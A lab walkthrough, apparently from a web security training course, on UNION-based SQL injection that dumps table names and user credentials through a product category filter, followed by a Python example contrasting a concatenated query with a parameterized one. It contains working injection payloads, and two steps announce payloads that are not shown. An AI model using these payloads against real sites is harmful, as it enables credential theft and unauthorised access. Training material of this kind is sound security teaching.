SQL injection attack, listing the database contents on non-Oracle databases

🛠️ Use Burp Suite to intercept and modify the request that sets the product category filter.

📊 Determine the number of columns returned by the query and which ones contain text data. Verify that two columns contain text using this payload:

`'+UNION+SELECT+'abc','def'--`

🔍 Retrieve the list of tables in the database with this payload:

🔐 Find the table with user credentials, then retrieve column details using:

👤 Find columns for usernames and passwords. Retrieve them using:

`'+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--`

🔑 Finally, locate the administrator's password and use it to log in!
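As an added example (not part of the original walkthrough and not the lab's own code), here is the category filter written the vulnerable way, by string concatenation, beside its parameterized form. It assumes a hypothetical `products` table in an in-memory SQLite database with constructed rows, and feeds both versions the page's two-column text probe:

```python
import sqlite3

# Constructed in-memory catalogue standing in for the lab's database
# (hypothetical schema; the lab's real table and column names are randomised).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        INSERT INTO products VALUES ('Lamp', 'A desk lamp', 'Gifts');
        INSERT INTO products VALUES ('Mug', 'A coffee mug', 'Gifts');
        INSERT INTO products VALUES ('Shoes', 'Running shoes', 'Clothing');
        """
    )
    return conn

# The page's two-column probe, URL-decoded.
PROBE = "' UNION SELECT 'abc','def'--"

def filter_vulnerable(conn: sqlite3.Connection, category: str) -> list:
    """Builds the WHERE clause by concatenation: the quote and UNION inside
    `category` become part of the SQL grammar, and the trailing -- comments
    out the closing quote the application appended."""
    sql = "SELECT name, description FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()

def filter_safe(conn: sqlite3.Connection, category: str) -> list:
    """Same query with a bound parameter: the value never touches the SQL
    text, so the quote and UNION are just characters in a string literal."""
    sql = "SELECT name, description FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()

if __name__ == "__main__":
    conn = build_db()
    print(filter_vulnerable(conn, "Gifts"))  # the two Gifts rows
    print(filter_vulnerable(conn, PROBE))    # [('abc', 'def')]: attacker-chosen row
    print(filter_safe(conn, PROBE))          # []: no category equals the literal string
```

SQLite has no `information_schema`, so the table-listing steps above are not reproduced here; the point is that binding the parameter stops the injection at the very first probe.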